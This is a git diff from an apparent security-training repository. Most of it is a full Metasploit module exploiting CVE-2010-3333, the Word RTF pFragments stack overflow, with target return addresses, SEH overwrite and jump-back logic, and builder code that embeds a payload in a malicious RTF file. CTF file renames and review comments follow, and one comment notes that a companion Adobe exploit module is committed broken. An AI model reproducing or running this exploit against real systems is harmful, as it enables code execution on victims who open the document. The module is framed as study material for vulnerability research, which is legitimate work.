+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'wushi of team509', # original discovery + 'unknown', # exploit found in the wild + 'jduck', # Metasploit module + 'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz + ], + 'References' => + [ + [ 'CVE', '2010-3333' ], + [ 'OSVDB', '69085' ], + [ 'MSB', 'MS10-087' ], + [ 'BID', '44652' ], + [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00", + 'DisableNops' => true # no need + }, + 'Platform' => 'win', + 'Targets' => + [ + # This automatic target will combine all targets into one file :) + [ 'Automatic', { } ], + + # Office v10.6854.6845, winword.exe v10.0.6854.0 + [ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English', + { + 'Offsets' => [ 23532, 45944 ], + #'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0 + 'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0 + } + ], + + # Office v11.8307.8324, winword.exe v11.0.8307.0 + # Office v11.8328.8221, winword.exe v11.0.8328.0 + [ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English', + { + 'Offsets' => [ 24580, 51156 ], + 'Ret' => 0x30001bdd # p/p/r in winword.exe + } + ], + + # In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed. + + # Office v12.0.6425.1000, winword.exe v12.0.6425.1000 + [ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record + } + ], + + [ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word. + } + ], + + [ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English', + { + 'Offsets' => [ 5956 ], + 'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word. 
+ } + ], + + + # crash on a deref path to heaven. + [ 'Crash Target for Debugging', + { + 'Offsets' => [ 65535 ], + 'Ret' => 0xdac0ffee + } + ] + ], + 'DisclosureDate' => 'Nov 09 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']), + ]) + end + + def add_target(rest, targ) + targ['Offsets'].each { |off| + seh = generate_seh_record(targ.ret) + rest[off, seh.length] = seh + distance = off + seh.length + jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string + rest[off + seh.length, jmp_back.length] = jmp_back + } + end + + def exploit + + # Prepare a sample SEH frame and backward jmp for length calculations + seh = generate_seh_record(0xdeadbeef) + jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string + + # RTF property Array parameters + el_size = sz_rand() + el_count = sz_rand() + + data = '' + # These words are presumably incorrectly used + # assert(amount1 <= amount2) + data << [0x1111].pack('v') * 2 + data << [0xc8ac].pack('v') + + # Filler + if target.name =~ /Debug/i + rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length) + else + len = 51200 + rand(1000) + rest = rand_text(len + seh.length + jmp_back.length) + rest[0, payload.encoded.length] = payload.encoded + end + + # Stick fake SEH frames here and there ;) + if target.name == "Automatic" + targets.each { |t| + next if t.name !~ /Windows/i + + add_target(rest, t) + } + else + add_target(rest, target) + end + + # Craft the array for the property value + sploit = "%d;%d;" % [el_size, el_count] + sploit << data.unpack('H*').first + sploit << rest.unpack('H*').first + + # Assemble it all into a nice RTF + content = "{\\rtf1" + content << "{\\shp" # shape + content << "{\\sp" # shape property + content << "{\\sn pFragments}" # property name + content << "{\\sv #{sploit}}" # property value + content << "}" + content << "}" + content << "}" + + 
print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(content) + + end + + def sz_rand + bad_sizes = [ 0, 2, 4, 8 ] + x = rand(9) + while bad_sizes.include? x + x = rand(9) + end + x + end +end diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_mod b/src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_mod similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_mod rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_mod diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_org b/src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_org similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/angrybird_org rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/angrybird_org diff --git a/src/writeup/6.2.3_re_codegate2017_angrybird/exp.py b/src/writeup/6.2.3_re_codegatectf2017_angrybird/exp.py similarity index 100% rename from src/writeup/6.2.3_re_codegate2017_angrybird/exp.py rename to src/writeup/6.2.3_re_codegatectf2017_angrybird/exp.py diff --git a/src/writeup/6.2.6_re_seccon2017_printf_machine/default.fs b/src/writeup/6.2.6_re_secconctf2017_printf_machine/default.fs similarity index 100% rename from src/writeup/6.2.6_re_seccon2017_printf_machine/default.fs rename to src/writeup/6.2.6_re_secconctf2017_printf_machine/default.fs diff --git a/src/writeup/6.2.6_re_seccon2017_printf_machine/fsmachine b/src/writeup/6.2.6_re_secconctf2017_printf_machine/fsmachine similarity index 100% rename from src/writeup/6.2.6_re_seccon2017_printf_machine/fsmachine rename to src/writeup/6.2.6_re_secconctf2017_printf_machine/fsmachine diff --git a/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet b/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet new file mode 100644 index 0000000..f200841 Binary files /dev/null and b/src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet differ
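Review bot: in the doc/5.8.1_z3.md hunk, deleting `$ python scripts/mk_make.py --python` leaves the build sequence as `$ cd z3`, `$ cd build`, `$ make`, with no step that generates the build directory or its Makefile, so the instructions no longer work as written. If the intent was only to drop the `--python` bindings flag, keep the line as `$ python scripts/mk_make.py`; otherwise reinstate it as it was.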
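Review bot: in the doc/2.3.2_ollydbg.md hunk the new shortcut list mixes separators: the F7 entry writes `单步步入:` with a colon while the F8 entry writes `单步步过,` with a comma; use one form for both. The new `## 命令行插件` heading is linked from the TOC but has no body and is preceded by two blank lines, so either add at least a sentence naming the plugin or leave the heading and TOC entry out until the content exists.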
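Review bot: doc/2.4.7_cuckoo.md is wired into SUMMARY.md and doc/2_tools.md in this commit, but both its `## 简介` and `## 安装` sections are empty, so the index now points at a page containing nothing but the cuckoosandbox.org link. Either fill in a short description and the install steps or hold the index entries until the page has content.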
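Review bot: the 参考资料 entry in the new doc/7.1.9_ms_word_2010-3333.md still reads `- https://www.cvedetails.com/cve/CVE-2010-2333`, the wrong identifier this commit otherwise corrects everywhere else; it should point at CVE-2010-3333. The heading and the first sentence of 漏洞描述 also write the id as `cve-2010-3333` while SUMMARY.md, doc/7_exploit.md and the 7.1.8 page use upper-case `CVE-`, the table header `| |推荐使用的环境 | 备注 |` is missing the space the other cells have, and `我们利用 Metasploit 来生成攻击样本` drops the trailing colon used on the 7.1.8 page and is followed by nothing, so the 漏洞复现 section should either carry the generation steps or be marked as to-do.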
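Review bot: in adobe_cooltype_sing.rb, `make_ttf` reads the font with `path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" )`, i.e. from the Metasploit data directory, while this commit adds cve-2010-2883.ttf next to the module under src/exploit/7.1.8_adobe_reader_2010-2883/; a README line or a sentence in doc/7.1.8 should say the copy beside the module is for reference only and that the framework looks in its own data/exploits path. Separately, several PDF dictionary literals in `make_pdf` are committed as empty `<>` while still being fed format arguments, e.g. `pdf << io_def(10) << n_obfu("<>" % [compressed.length, ttf.length]) << eol`, the xfa heredoc contains only `1`, and the trailer line `pdf << n_obfu("<>" << eol` has no closing parenthesis, so the file as committed does not parse and would emit no /Length, /Filter, /Size or /Root entries; diff it against the upstream metasploit-framework module and restore the dictionary contents before merging.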
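Review bot: ms10_087_rtf_pfragments_bof.rb is a verbatim copy of the upstream Metasploit module, but its header records only `# Current source: https://github.com/rapid7/metasploit-framework`, not the framework revision it was taken from; note the upstream commit or release in the commit message or in doc/7.1.9 so readers can tell when the copy has drifted. Since the module depends on `include Msf::Exploit::Seh` and `Metasm::Shellcode.assemble`, it only runs from inside the framework's modules tree, and the doc's table lists MS Office 2003 SP3 on Windows XP SP3, so the 7.1.9 page should also state which of the module's named targets corresponds to that environment instead of leaving 漏洞复现 without the steps.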